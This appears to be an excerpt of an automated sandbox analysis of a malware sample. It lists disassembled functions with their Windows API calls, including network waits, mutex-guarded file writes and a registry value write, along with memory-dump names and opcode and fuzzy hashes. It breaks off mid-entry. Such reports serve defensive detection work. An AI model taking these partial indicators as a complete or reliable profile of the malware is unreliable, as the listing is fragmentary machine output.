                                                                                                                                                                      • Instruction ID: 4ede836604282eb9d1ed79adb64ce98868e67e2ef163ffd809042220ff7a7563
                                                                                                                                                                      • Opcode Fuzzy Hash: 27f0bc4b4147f3daaab859d2f9508a4a4f382c87182947d0d0d6d91ea91df48e
                                                                                                                                                                      • Instruction Fuzzy Hash: 7651A3786007059BFF20EF24C984B9AB7E8BF44718F14492AE956DB280DB75F840DF91
                                                                                                                                                                      Function 02C63870 Relevance: 10.6, APIs: 7, Instructions: 149threadnetworktimeCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 02C63883
                                                                                                                                                                      • SetWaitableTimer.KERNEL32(?,?,?,00000000,00000000,00000000,?,00000000,FFFFD8F0,000000FF), ref: 02C638C4
                                                                                                                                                                      • WSAWaitForMultipleEvents.WS2_32(00000004,?,00000000,000000FF,00000000), ref: 02C63931
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 02C6395C
                                                                                                                                                                      • GetLastError.KERNEL32(?,00000000,000000FF,00000000), ref: 02C639F4
                                                                                                                                                                      • SetLastError.KERNEL32(0000139F,?,00000000,000000FF,00000000), ref: 02C63A22
                                                                                                                                                                      • WSAGetLastError.WS2_32(?,00000000,000000FF,00000000), ref: 02C63A39
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast$CurrentThread$EventsMultipleTimerWaitWaitable
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3058130114-0
                                                                                                                                                                      • Opcode ID: f465474630c30891e437f65232dffdf5523e20e669d825d9d0f400f13687f7c1
                                                                                                                                                                      • Instruction ID: 5ede6ca77a58c8511b9bafdf88db4bc7284f93753e356e55281eaf7f5b59ad01
                                                                                                                                                                      • Opcode Fuzzy Hash: f465474630c30891e437f65232dffdf5523e20e669d825d9d0f400f13687f7c1
                                                                                                                                                                      • Instruction Fuzzy Hash: DC51BF70A007419BDB209F64C9C8BBAB7E5BF85B18F504959DD5ADB280EB31EA40CF91
                                                                                                                                                                      Function 0377E6B0 Relevance: 10.5, APIs: 7, Instructions: 44filesynchronizationstringCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,?,?,0377E815,?,?,?,?,74DF23A0,00000000), ref: 0377E6BD
                                                                                                                                                                      • CreateFileW.KERNEL32(037A0D80,40000000,00000002,00000000,00000004,00000002,00000000,?,?,0377E815,?,?,?,?,74DF23A0,00000000), ref: 0377E6D7
                                                                                                                                                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0377E6F2
                                                                                                                                                                      • lstrlenW.KERNEL32(?,00000000,00000000), ref: 0377E6FF
                                                                                                                                                                      • WriteFile.KERNEL32(00000000,?,00000000), ref: 0377E70A
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0377E711
                                                                                                                                                                      • ReleaseMutex.KERNEL32(00000000), ref: 0377E71E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$CloseCreateHandleMutexObjectPointerReleaseSingleWaitWritelstrlen
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4202892810-0
                                                                                                                                                                      • Opcode ID: e164b31dd228f1bf2178b5d9a3100e87ba4cd2175fd9de4eb0cf7900e9bf1595
                                                                                                                                                                      • Instruction ID: 296cd192ff3df01f744ff5db4d9a826bd16d423e1bd1f6b6cd7edb167053f27a
                                                                                                                                                                      • Opcode Fuzzy Hash: e164b31dd228f1bf2178b5d9a3100e87ba4cd2175fd9de4eb0cf7900e9bf1595
                                                                                                                                                                      • Instruction Fuzzy Hash: 7B012D71281208BBE214B764BC0FF9A366CD749721F108745F714E61C5C7B8581187A4
                                                                                                                                                                      Function 03783D2E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,03796318,00000008,03783E36,00000000,00000000,?,03784500,00000000,00000001,00000000,?,03788DE6,00000018,03796448,0000000C), ref: 03783D3F
                                                                                                                                                                      • __lock.LIBCMT ref: 03783D73
                                                                                                                                                                        • Part of subcall function 03788E5B: __mtinitlocknum.LIBCMT ref: 03788E71
                                                                                                                                                                        • Part of subcall function 03788E5B: __amsg_exit.LIBCMT ref: 03788E7D
                                                                                                                                                                        • Part of subcall function 03788E5B: EnterCriticalSection.KERNEL32(00000000,00000000,?,03783F06,0000000D,03796340,00000008,03783FFF,00000000,?,037810F0,00000000,03796278,00000008,03781155,?), ref: 03788E85
                                                                                                                                                                      • InterlockedIncrement.KERNEL32(?), ref: 03783D80
                                                                                                                                                                      • __lock.LIBCMT ref: 03783D94
                                                                                                                                                                      • ___addlocaleref.LIBCMT ref: 03783DB2
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                                                                                                                      • String ID: KERNEL32.DLL
                                                                                                                                                                      • API String ID: 637971194-2576044830
                                                                                                                                                                      • Opcode ID: 5aae2047b7784a2c55cff49b84ed8b07f1b2f3329925a6f264637cd3310d1e0b
                                                                                                                                                                      • Instruction ID: 6d22edb9e1fb2280c7f986dd1aae3700977e01883f9835bc5297ddb911a26f91
                                                                                                                                                                      • Opcode Fuzzy Hash: 5aae2047b7784a2c55cff49b84ed8b07f1b2f3329925a6f264637cd3310d1e0b
                                                                                                                                                                      • Instruction Fuzzy Hash: AE018479480B01EFFB20FF69D809749FBE0AF44724F108A4ED596AB7A0CBB4A545CB15
                                                                                                                                                                      Function 02C697E2 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,02C77C00,00000008,02C698EA,00000000,00000000,?,02C69FB0,00000000,00000001,00000000,?,02C6C0CF,00000018,02C77C70,0000000C), ref: 02C697F3
                                                                                                                                                                      • __lock.LIBCMT ref: 02C69827
                                                                                                                                                                        • Part of subcall function 02C6C144: __mtinitlocknum.LIBCMT ref: 02C6C15A
                                                                                                                                                                        • Part of subcall function 02C6C144: __amsg_exit.LIBCMT ref: 02C6C166
                                                                                                                                                                        • Part of subcall function 02C6C144: EnterCriticalSection.KERNEL32(00000000,00000000,?,02C699BA,0000000D,02C77C28,00000008,02C69AB1,00000000,?,02C67711,00000000,02C77B60,00000008,02C67776,?), ref: 02C6C16E
                                                                                                                                                                      • InterlockedIncrement.KERNEL32(?), ref: 02C69834
                                                                                                                                                                      • __lock.LIBCMT ref: 02C69848
                                                                                                                                                                      • ___addlocaleref.LIBCMT ref: 02C69866
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                                                                                                                      • String ID: KERNEL32.DLL
                                                                                                                                                                      • API String ID: 637971194-2576044830
                                                                                                                                                                      • Opcode ID: 9ac01b06c9d5690d68d44f5207b3511c6dde6299e6f2518af84079dd06ff62f0
                                                                                                                                                                      • Instruction ID: 9ad7fd6743fef40443e74a4dfc67fc50ac3d8add0c9e42f91a4470d72b7a636a
                                                                                                                                                                      • Opcode Fuzzy Hash: 9ac01b06c9d5690d68d44f5207b3511c6dde6299e6f2518af84079dd06ff62f0
                                                                                                                                                                      • Instruction Fuzzy Hash: 4F01C0B1840B009FE320AF69C98C759FBF1AF54321F10890ED8DA97290CBB4A644DF11
                                                                                                                                                                      Function 0377B78C Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 32registryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(80000001,Console,00000000,00000002), ref: 0377B7A7
                                                                                                                                                                      • RegDeleteValueW.ADVAPI32(?,IpDatespecial), ref: 0377B7B7
                                                                                                                                                                      • RegSetValueExW.ADVAPI32(?,IpDatespecial,00000000,00000003,?,00000004), ref: 0377B7CE
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,00000004), ref: 0377B7D9
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Value$CloseDeleteOpen
                                                                                                                                                                      • String ID: Console$IpDatespecial
                                                                                                                                                                      • API String ID: 3183427449-1840232981
                                                                                                                                                                      • Opcode ID: 285438ca7be8292d9dda37bbc5c68670987143911d4dbd5f8d307eb7f3649e03
                                                                                                                                                                      • Instruction ID: ea708eee807a62877f83689af6ecc8e320521b446e5d9ff9dab8b9844603d848
                                                                                                                                                                      • Opcode Fuzzy Hash: 285438ca7be8292d9dda37bbc5c68670987143911d4dbd5f8d307eb7f3649e03
                                                                                                                                                                      • Instruction Fuzzy Hash: 6BF02771344348FFE325A764AC0FF1AB764F789710F008B4FF780651828264A001C755
                                                                                                                                                                      Function 037902FC Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 23COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __getptd.LIBCMT ref: 0379031D
                                                                                                                                                                        • Part of subcall function 03783E5B: __getptd_noexit.LIBCMT ref: 03783E5E
                                                                                                                                                                        • Part of subcall function 03783E5B: __amsg_exit.LIBCMT ref: 03783E6B
                                                                                                                                                                      • __getptd.LIBCMT ref: 0379032E
                                                                                                                                                                      • __getptd.LIBCMT ref: 0379033C
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                                                                      • String ID: MOC$RCC$csm
                                                                                                                                                                      • API String ID: 803148776-2671469338
                                                                                                                                                                      • Opcode ID: a1f0d33c8d38bd48e94782b4de51ff7935ea793739f44933f6f473294c896614
                                                                                                                                                                      • Instruction ID: 47f21f1f0dd88a0a703a1df303f7e62a249c01377c37bac3dfda92075134647b
                                                                                                                                                                      • Opcode Fuzzy Hash: a1f0d33c8d38bd48e94782b4de51ff7935ea793739f44933f6f473294c896614
                                                                                                                                                                      • Instruction Fuzzy Hash: 20E01A3C560204CFEB20EB6CD08AB6836D9BF4CA14F5905A7D40CCF222C738E4908A83
                                                                                                                                                                      Function 02C733F1 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 23COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __getptd.LIBCMT ref: 02C73412
                                                                                                                                                                        • Part of subcall function 02C6990F: __getptd_noexit.LIBCMT ref: 02C69912
                                                                                                                                                                        • Part of subcall function 02C6990F: __amsg_exit.LIBCMT ref: 02C6991F
                                                                                                                                                                      • __getptd.LIBCMT ref: 02C73423
                                                                                                                                                                      • __getptd.LIBCMT ref: 02C73431
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                                                                      • String ID: MOC$RCC$csm
                                                                                                                                                                      • API String ID: 803148776-2671469338
                                                                                                                                                                      • Opcode ID: 6cafc6eb67b1167ca934f12c74b901a19b36c58c2209ef507fb1707306695bdb
                                                                                                                                                                      • Instruction ID: 5225a0c840c634e7907a89fb12d50d9a723bf948b54f46991bfdac8a03af220f
                                                                                                                                                                      • Opcode Fuzzy Hash: 6cafc6eb67b1167ca934f12c74b901a19b36c58c2209ef507fb1707306695bdb
                                                                                                                                                                      • Instruction Fuzzy Hash: 34E01A305041888EC724AB68C08DB783BE5FBC8318F5A44F5E45DDB222C739EA50F946
                                                                                                                                                                      Function 03779C30 Relevance: 9.1, APIs: 6, Instructions: 108COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • _malloc.LIBCMT ref: 03779C3F
                                                                                                                                                                        • Part of subcall function 0377F673: __FF_MSGBANNER.LIBCMT ref: 0377F68C
                                                                                                                                                                        • Part of subcall function 0377F673: __NMSG_WRITE.LIBCMT ref: 0377F693
                                                                                                                                                                        • Part of subcall function 0377F673: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,03784500,00000000,00000001,00000000,?,03788DE6,00000018,03796448,0000000C,03788E76), ref: 0377F6B8
                                                                                                                                                                      • _free.LIBCMT ref: 03779C63
                                                                                                                                                                      • _memset.LIBCMT ref: 03779CBB
                                                                                                                                                                        • Part of subcall function 0377A610: GetObjectW.GDI32(?,00000054,?), ref: 0377A62E
                                                                                                                                                                      • CreateDIBSection.GDI32(00000000,00000008,00000000,00000000,00000000,00000000), ref: 03779CD3
                                                                                                                                                                      • _free.LIBCMT ref: 03779CE4
                                                                                                                                                                      • _free.LIBCMT ref: 03779D23
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _free$AllocateCreateHeapObjectSection_malloc_memset
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1756752955-0
                                                                                                                                                                      • Opcode ID: c9b824b4f6f425528869821faf3fac010f304e4e9e2069a0b99fdeadb992eb45
                                                                                                                                                                      • Instruction ID: cfa9e7b64ca34f995fcabe88d5d8e92141579368c87c3fbc19f7597a1cdc4df5
                                                                                                                                                                      • Opcode Fuzzy Hash: c9b824b4f6f425528869821faf3fac010f304e4e9e2069a0b99fdeadb992eb45
                                                                                                                                                                      • Instruction Fuzzy Hash: 0C31A1B26013066BEB10DF3AD984B56B7E8BF4A314F04853ADA09CB650F7B1E454CBA1
                                                                                                                                                                      Function 03775080 Relevance: 9.1, APIs: 6, Instructions: 107networkCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • EnterCriticalSection.KERNEL32(000002FF), ref: 037750CA
                                                                                                                                                                      • WSASetLastError.WS2_32(0000139F), ref: 037750E2
                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,?,00000000,000000FF), ref: 037750EC
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CriticalSection$EnterErrorLastLeave
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4082018349-0
                                                                                                                                                                      • Opcode ID: 25bc45b261c2acb6f3d8ff722be6f51b8679b0991b1c7b479135f7982b8d8b91
                                                                                                                                                                      • Instruction ID: c1967892b2471ae2a0dfff31c3905607f5361353d025eccdfaf00a5cf1b3d5ff
                                                                                                                                                                      • Opcode Fuzzy Hash: 25bc45b261c2acb6f3d8ff722be6f51b8679b0991b1c7b479135f7982b8d8b91
                                                                                                                                                                      • Instruction Fuzzy Hash: 8031B076604348ABDB14DF54D845B6AB3E8FB49721F008A5EE915C7680E73AA810CB50
                                                                                                                                                                      Function 02C65060 Relevance: 9.1, APIs: 6, Instructions: 107networkCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • EnterCriticalSection.KERNEL32(000002FF), ref: 02C650AA
                                                                                                                                                                      • WSASetLastError.WS2_32(0000139F), ref: 02C650C2
                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,?,00000000,000000FF), ref: 02C650CC
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CriticalSection$EnterErrorLastLeave
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4082018349-0
                                                                                                                                                                      • Opcode ID: a1e9ff6469bb4cf599bfd9999b61cfbe1484d4c872b1949bab025c54520b25c1
                                                                                                                                                                      • Instruction ID: 753567789646d87140935781ce98b2a18eb574711eb93022b9ef526636c73949
                                                                                                                                                                      • Opcode Fuzzy Hash: a1e9ff6469bb4cf599bfd9999b61cfbe1484d4c872b1949bab025c54520b25c1
                                                                                                                                                                      • Instruction Fuzzy Hash: 9331CB72A44644ABD720CF94EC89B6AB3E9FB48751F508A1AED06C7780D736E810CB90
                                                                                                                                                                      Function 02C6485A Relevance: 9.1, APIs: 6, Instructions: 91sleepsynchronizationCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,E484B528,?,?,?), ref: 02C648E1
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,E484B528,?,?,?), ref: 02C648EC
                                                                                                                                                                      • Sleep.KERNEL32(00000258,?,E484B528,?,?,?), ref: 02C648F9
                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,E484B528,?,?,?), ref: 02C64914
                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,E484B528,?,?,?), ref: 02C6491D
                                                                                                                                                                      • Sleep.KERNEL32(0000012C,?,E484B528,?,?,?), ref: 02C6492E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseHandleObjectSingleSleepWait
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 640476663-0
                                                                                                                                                                      • Opcode ID: 6bcaede5f1886750debe952bbea589acb78c56c6fc0b0988769e3d1ae8be83e5
                                                                                                                                                                      • Instruction ID: eac536ef73d1c1c8866a309e30a484af165a67c75058a2096b70a4a5bec3a19a
                                                                                                                                                                      • Opcode Fuzzy Hash: 6bcaede5f1886750debe952bbea589acb78c56c6fc0b0988769e3d1ae8be83e5
                                                                                                                                                                      • Instruction Fuzzy Hash: 33216A721442848BCB24EBA9DC88A97F3F9FF8A754B540B08E554C7385C6759805CFE0
                                                                                                                                                                      Function 037905AE Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __CreateFrameInfo.LIBCMT ref: 037905D6
                                                                                                                                                                        • Part of subcall function 037900B7: __getptd.LIBCMT ref: 037900C5
                                                                                                                                                                        • Part of subcall function 037900B7: __getptd.LIBCMT ref: 037900D3
                                                                                                                                                                      • __getptd.LIBCMT ref: 037905E0
                                                                                                                                                                        • Part of subcall function 03783E5B: __getptd_noexit.LIBCMT ref: 03783E5E
                                                                                                                                                                        • Part of subcall function 03783E5B: __amsg_exit.LIBCMT ref: 03783E6B
                                                                                                                                                                      • __getptd.LIBCMT ref: 037905EE
                                                                                                                                                                      • __getptd.LIBCMT ref: 037905FC
                                                                                                                                                                      • __getptd.LIBCMT ref: 03790607
                                                                                                                                                                      • _CallCatchBlock2.LIBCMT ref: 0379062D
                                                                                                                                                                        • Part of subcall function 0379015C: __CallSettingFrame@12.LIBCMT ref: 037901A8
                                                                                                                                                                        • Part of subcall function 037906D4: __getptd.LIBCMT ref: 037906E3
                                                                                                                                                                        • Part of subcall function 037906D4: __getptd.LIBCMT ref: 037906F1
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1602911419-0
                                                                                                                                                                      • Opcode ID: 9bd4502114ce8111bf9d454e7a8e4889f92212de9bfeab1b909444a702fd674f
                                                                                                                                                                      • Instruction ID: 5c61e3235416dec17f5b019835b32c51c6fafffd5120f168d91853f444075f7b
                                                                                                                                                                      • Opcode Fuzzy Hash: 9bd4502114ce8111bf9d454e7a8e4889f92212de9bfeab1b909444a702fd674f
                                                                                                                                                                      • Instruction Fuzzy Hash: FD11DAB9D51309DFEF10EFA4D448B9D77B0FF08710F10816AE825AB250DB7899559F50
                                                                                                                                                                      Function 0360FF6D Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __CreateFrameInfo.LIBCMT ref: 0360FF95
                                                                                                                                                                        • Part of subcall function 0360FA76: __getptd.LIBCMT ref: 0360FA84
                                                                                                                                                                        • Part of subcall function 0360FA76: __getptd.LIBCMT ref: 0360FA92
                                                                                                                                                                      • __getptd.LIBCMT ref: 0360FF9F
                                                                                                                                                                        • Part of subcall function 0360381A: __getptd_noexit.LIBCMT ref: 0360381D
                                                                                                                                                                        • Part of subcall function 0360381A: __amsg_exit.LIBCMT ref: 0360382A
                                                                                                                                                                      • __getptd.LIBCMT ref: 0360FFAD
                                                                                                                                                                      • __getptd.LIBCMT ref: 0360FFBB
                                                                                                                                                                      • __getptd.LIBCMT ref: 0360FFC6
                                                                                                                                                                      • _CallCatchBlock2.LIBCMT ref: 0360FFEC
                                                                                                                                                                        • Part of subcall function 0360FB1B: __CallSettingFrame@12.LIBCMT ref: 0360FB67
                                                                                                                                                                        • Part of subcall function 03610093: __getptd.LIBCMT ref: 036100A2
                                                                                                                                                                        • Part of subcall function 03610093: __getptd.LIBCMT ref: 036100B0
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4158929233.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_35f0000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1602911419-0
                                                                                                                                                                      • Opcode ID: 5f1381efd39d468ef928fc2953ab13acdae555040b7c1ee41bdff31c76f18644
                                                                                                                                                                      • Instruction ID: ba09f7a248fc97c2998ccab73c5e7881e07bd7fab72a292e5ed9c188f19e960e
